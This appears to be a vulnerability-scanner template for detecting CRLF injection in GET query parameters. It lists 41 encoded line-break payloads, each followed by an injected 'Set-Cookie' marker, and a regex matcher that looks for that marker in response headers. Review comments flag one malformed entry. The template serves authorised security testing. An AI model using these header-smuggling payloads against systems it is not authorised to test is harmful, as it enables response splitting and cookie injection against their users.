# DAST template: for GET requests, appends each `escape` payload followed by a
# marker `Set-Cookie` header to query values and matches when that marker cookie
# shows up in the response headers. A match means query-derived data reaches the
# response header block without CR/LF being rejected or encoded; the fix belongs
# in the code that writes headers.
id: crlf-injection

info:
  name: CRLF Injection
  author: pdteam
  severity: low
  metadata:
    # Matches the 41 entries in `escape` below, with one fuzz rule.
    max-request: 41
  tags: crlf,dast

http:
  # Only requests whose method is GET are fuzzed.
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      # Line-break candidates in several encodings. Each is substituted for
      # {{escape}} in the fuzz rule.
      escape:
        # Percent-encoded NUL, LF, CR, tab and space combinations.
        - "%00"
        - "%0a"
        - "%0a%20"
        - "%0d"
        - "%0d%09"
        - "%0d%0a"
        - "%0d%0a%09"
        - "%0d%0a%20"
        - "%0d%20"
        - "%20"
        - "%20%0a"
        - "%20%0d"
        - "%20%0d%0a"
        # Prefixed with an encoded '#'.
        - "%23%0a"
        - "%23%0a%20"
        - "%23%0d"
        - "%23%0d%0a"
        # NOTE(review): "%oa" has the letter 'o', so it is not a valid percent
        # escape. It was probably meant to be "%23%0a", which is already listed
        # above. Left as-is; removing it would also change max-request.
        - "%23%oa"
        # Double-encoded: one decode pass yields "%0" and "%0a" respectively.
        - "%25%30"
        - "%25%30%61"
        # Prefixed with path-traversal-style segments.
        - "%2e%2e%2f%0d%0a"
        - "%2f%2e%2e%0d%0a"
        - "%2f..%0d%0a"
        # Prefixed with an encoded '?'.
        - "%3f"
        - "%3f%0a"
        - "%3f%0d"
        - "%3f%0d%0a"
        # UTF-8 for U+560A / U+560D, whose low byte is 0x0A / 0x0D. Relevant
        # where a component narrows code points to a single byte.
        - "%e5%98%8a%e5%98%8d"
        - "%e5%98%8a%e5%98%8d%0a"
        - "%e5%98%8a%e5%98%8d%0d"
        - "%e5%98%8a%e5%98%8d%0d%0a"
        - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
        # Non-standard %uXXXX escapes.
        - "%u0000"
        - "%u000a"
        - "%u000d"
        # Double-quoted, so YAML turns these escapes into raw CR / LF / tab
        # characters rather than literal backslashes.
        - "\r"
        - "\r%20"
        - "\r\n"
        - "\r\n%20"
        - "\r\n\t"
        - "\r\t"

    fuzzing:
      # postfix: the fuzz string is appended to the existing query value.
      - part: query
        type: postfix
        fuzz:
          - "{{escape}}Set-Cookie:crlfinjection=crlfinjection"

    # presumably ends the payload run after the first matching response; confirm
    # against the engine documentation.
    stop-at-first-match: true
    matchers:
      # Checked against response headers only. (?m) with ^ anchors the match to
      # the start of a header line, and the marker pair must be followed by end
      # of line or ';'. It may be the first pair or come after a ';'. A marker
      # reflected in the body or inside another header's value does not match.
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
# NOTE(review): the digest line below looks like a signature over the template
# text. Any edit above it, comments included, presumably needs a re-sign; confirm
# with the project's signing tooling.
# digest: 4a0a00473045022000c5e1faa6655bbb3adcbba890473900bb1a7ea522bbee7684da04fcd58ad613022100c3dffcd18d8133aebdad962d7013490ca3e90c50a0cfdf684c5ac54ab0ad2e34:922c64590222798bb761d5b6d8e72950